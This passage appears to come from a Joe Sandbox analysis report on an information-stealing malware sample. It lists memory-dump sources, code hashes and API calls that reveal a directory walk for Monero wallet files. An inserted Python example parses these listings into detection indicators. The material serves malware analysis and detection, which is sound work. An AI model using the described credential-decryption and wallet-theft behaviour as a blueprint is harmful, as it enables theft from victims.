                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 60d3ff593a453b778b518d0414d91d6ef6c9bed707d2a29b8dee51220bdb9ded
                  • Instruction ID: 79d25fc2ac710a487b43cee22011f3d079fcb1ccbd6d8d594c11bb2fd127f04c
                  • Opcode Fuzzy Hash: 60d3ff593a453b778b518d0414d91d6ef6c9bed707d2a29b8dee51220bdb9ded
                  • Instruction Fuzzy Hash: AF11CCB4A00209DFDB04DF94D985AAE77B5FF88301F104568E915A7390D774AE11CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3>Z$}<=
                  • API String ID: 0-687808223
                  • Opcode ID: 7ea6bd24833557cd330c43fd87001da06fc30eefe84a689ece711d24de998d47
                  • Instruction ID: 5c2378a3e5d2017319960ccc5e1e141f1a1c5207f7c84df54c5e7d3c4928d1f7
                  • Opcode Fuzzy Hash: 7ea6bd24833557cd330c43fd87001da06fc30eefe84a689ece711d24de998d47
                  • Instruction Fuzzy Hash: 76B229F3A0C2049FE3046E2DEC8567ABBE9EF94720F16493DEAC4C3744EA7558058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ai&}$wK^M
                  • API String ID: 0-3948353111
                  • Opcode ID: 63922ca1a160b51dbae456ce2db0c6a5b6fc74e0bbbfd7055e0eb5fffb87692b
                  • Instruction ID: 1aa1c1f7bfa1971993727b8982644769d7c21016bb7c1fc37ec270cbf54452b5
                  • Opcode Fuzzy Hash: 63922ca1a160b51dbae456ce2db0c6a5b6fc74e0bbbfd7055e0eb5fffb87692b
                  • Instruction Fuzzy Hash: AB716AB3A0D2149FD714AE2DEC8163AF7E9EF94720F1A492DEAC4C7340EA35580186D6
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006415B8,00640D96), ref: 0062F71E
                  • StrCmpCA.SHLWAPI(?,006415BC), ref: 0062F76F
                  • StrCmpCA.SHLWAPI(?,006415C0), ref: 0062F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0062FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 5e9d896aa01db2d4672592e1ecfa3d466fd2625c9b9be430a9653db60a122340
                  • Instruction ID: 06ea30ffdf383a4aae746accf94fa84c2739586dc6ca7f33ef49599410626b48
                  • Opcode Fuzzy Hash: 5e9d896aa01db2d4672592e1ecfa3d466fd2625c9b9be430a9653db60a122340
                  • Instruction Fuzzy Hash: F811B17180011DABDB64EBF0EC95AED733AAF10300F4042ADA55A56092EF302B4ADBD6
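Added example, not part of the Joe Sandbox report or of the Stealc sample: a small Python parser for the per-function "APIs" listings in this section (the CryptUnprotectData / LocalAlloc / LocalFree entry and the FindFirstFileA / StrCmpCA / FindNextFileA entry whose subcall carries the \Monero\wallet.keys string). It turns each "• Func.MODULE(args), ref: ADDR" line into a call record with its call-site address and subcall parent, and tags the credential-decryption and wallet-file enumeration behaviour those entries show. The record layout and the indicator rules are this example's own assumptions; the sample input is constructed by copying the listing lines from this page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed input: the two "APIs" listings copied verbatim from this report.
SAMPLE = r"""
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00629BA3
• LocalFree.KERNEL32(?), ref: 00629BD3
APIs
  • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
  • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006415B8,00640D96), ref: 0062F71E
• StrCmpCA.SHLWAPI(?,006415BC), ref: 0062F76F
• StrCmpCA.SHLWAPI(?,006415C0), ref: 0062F785
• FindNextFileA.KERNEL32(000000FF,?), ref: 0062FAB1
• FindClose.KERNEL32(000000FF), ref: 0062FAC3
"""

# One API line, optionally prefixed with the "Part of subcall function ADDR:" marker
# Joe Sandbox uses for calls made inside a callee of the listed function.
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                # address of the call instruction
    parent: Optional[int]   # subcall function the call belongs to, if any


def parse_api_listing(text: str) -> List[List[ApiCall]]:
    """Split the text into function entries (each opened by an "APIs" header) and
    parse every API line of each entry. Lines that do not match are skipped."""
    entries: List[List[ApiCall]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            entries.append([])
            continue
        m = API_LINE.match(line)
        if not m or not entries:
            continue
        args = tuple(m.group("args").split(",")) if m.group("args") else ()
        entries[-1].append(ApiCall(
            api=m.group("api"),
            module=m.group("module").upper(),
            args=args,
            ref=int(m.group("ref"), 16),
            parent=int(m.group("parent"), 16) if m.group("parent") else None,
        ))
    return entries


def call_sites(entries: List[List[ApiCall]], api: str) -> List[int]:
    """Every call-site address of one API across all entries (breakpoint list)."""
    return sorted(c.ref for entry in entries for c in entry if c.api == api)


# Indicator rules over one entry's API names and string arguments. The rule set is an
# assumption of this example, not a Joe Sandbox signature.
def classify(entry: List[ApiCall]) -> Set[str]:
    apis = {c.api for c in entry}
    args = [a for c in entry for a in c.args]
    hits: Set[str] = set()
    if "CryptUnprotectData" in apis:
        hits.add("dpapi_unprotect")          # decrypting DPAPI-protected blobs
    if {"FindFirstFileA", "FindNextFileA"} <= apis or {"FindFirstFileW", "FindNextFileW"} <= apis:
        hits.add("file_enumeration")         # directory walk
    if any("wallet" in a.lower() for a in args):
        hits.add("wallet_path_reference")    # e.g. \Monero\wallet.keys
    return hits


if __name__ == "__main__":
    for i, entry in enumerate(parse_api_listing(SAMPLE)):
        print(f"entry {i}: {[c.api for c in entry]} -> {sorted(classify(entry))}")
```

Feeding it the two listings above yields one entry tagged dpapi_unprotect and one tagged file_enumeration plus wallet_path_reference; the StrCmpCA call sites (0x62F76F, 0x62F785) are the natural places to break if you want to see which directory names the enumeration loop skips.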
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mv=
                  • API String ID: 0-1032575449
                  • Opcode ID: 06d09e0fc6b59da00f0f26d543b4624ba935f694b6c8ac2f26505a5756ef7eb5
                  • Instruction ID: 6699a167afdbdb2f901f6b31c0884228e75aba102b833d96fe7439fdc70cd50d
                  • Opcode Fuzzy Hash: 06d09e0fc6b59da00f0f26d543b4624ba935f694b6c8ac2f26505a5756ef7eb5
                  • Instruction Fuzzy Hash: 4F7137F3E182245BE3506E2CDD4876ABBD5EB94320F1B463DDEC893784E9799C0486C6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Sd?~
                  • API String ID: 0-1480682155
                  • Opcode ID: b4be8d9e5dad01728ce47cdbdb3a183222146b5474790bccdfea205d7b0442ca
                  • Instruction ID: 05c079a449bb077b2d76fe591a04a271fde70639b49dd93b2a650db548bdd3fa
                  • Opcode Fuzzy Hash: b4be8d9e5dad01728ce47cdbdb3a183222146b5474790bccdfea205d7b0442ca
                  • Instruction Fuzzy Hash: 99416AF79082085FE314BE29EC85776B7E6DB90320F16813DDAC5873C4F93959498646
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: AQY=
                  • API String ID: 0-1552092879
                  • Opcode ID: 8439ca3eb026dff466eec4a473c0a393e792b697b319e8ed8fcf82db2752b831
                  • Instruction ID: 6f508a5d4e91246860e7f4b900ec94bdb58bc4fd07da7184d69e3948f5ce2858
                  • Opcode Fuzzy Hash: 8439ca3eb026dff466eec4a473c0a393e792b697b319e8ed8fcf82db2752b831
                  • Instruction Fuzzy Hash: 784124F3E482045FE300AE6CDCC0766B7DADF94310F6A853CEB98D7748E93999058296
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Rpw
                  • API String ID: 0-3594663097
                  • Opcode ID: fdd429c9dc11031785d4886cd6b6097dc427d829734cd9bed8ea623ff081f19b
                  • Instruction ID: ef4e084ad361e2cb540cfa530b0d43f0d38231c3c16db89895ce574e954ce96b
                  • Opcode Fuzzy Hash: fdd429c9dc11031785d4886cd6b6097dc427d829734cd9bed8ea623ff081f19b
                  • Instruction Fuzzy Hash: E44138B250C300AFE309AF1AD88566EFBE9FF98720F16892DE6C583A54D73454808A57
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 119dac8ed904974dbb8f388dd872ae70df35b25f1d6b427b74facf806aec48bc
                  • Instruction ID: bbaf7367b589fc3e385a8aaf66875faac478a10e389c43d90d0c61d79d8ae737
                  • Opcode Fuzzy Hash: 119dac8ed904974dbb8f388dd872ae70df35b25f1d6b427b74facf806aec48bc
                  • Instruction Fuzzy Hash: C5513CB3A182108BE3446E29DC847BAF6D5DBD4320F1B453DEAC9D7784D9785C058787
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 320d1a1516fddd3d038ae428a68287df2871285256b3f09ccba9533d5ea0007f
                  • Instruction ID: 242633a606b07819de2f0386961b2d7c8a8c95cf5376ed752a0d562cda0af4ca
                  • Opcode Fuzzy Hash: 320d1a1516fddd3d038ae428a68287df2871285256b3f09ccba9533d5ea0007f
                  • Instruction Fuzzy Hash: 4341E8F3608204AFF3045E29EC957BAB7D6EFD4720F29853DE685C7780ED7998028256
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e2030ab2f9398cd2ef9cbb2358fd48b5fe47a8064e139aafaf0ff51f5c194cb
                  • Instruction ID: 6186b3b6605606c3724f1cc59e4b94e917730766e1fc9f6d8238a311f1de4b27
                  • Opcode Fuzzy Hash: 2e2030ab2f9398cd2ef9cbb2358fd48b5fe47a8064e139aafaf0ff51f5c194cb
                  • Instruction Fuzzy Hash: C43108B250D6109FE301FF29D8857AAFBE6EF98311F16892CD6D483A58DA345450CB87
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cca2488c4e717cb1fac6a0994c89105a98fde1840e80f642ee576d5c1f64e70d
                  • Instruction ID: 719d69c8029b1d2b4cf9066c95286a78e49a46502528fa6c30a62f1e3fe5db2d
                  • Opcode Fuzzy Hash: cca2488c4e717cb1fac6a0994c89105a98fde1840e80f642ee576d5c1f64e70d
                  • Instruction Fuzzy Hash: F02138B210C604AFE312BE1ADC857AEFBE6FFD8310F16881DD2D483610E63464518A97
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
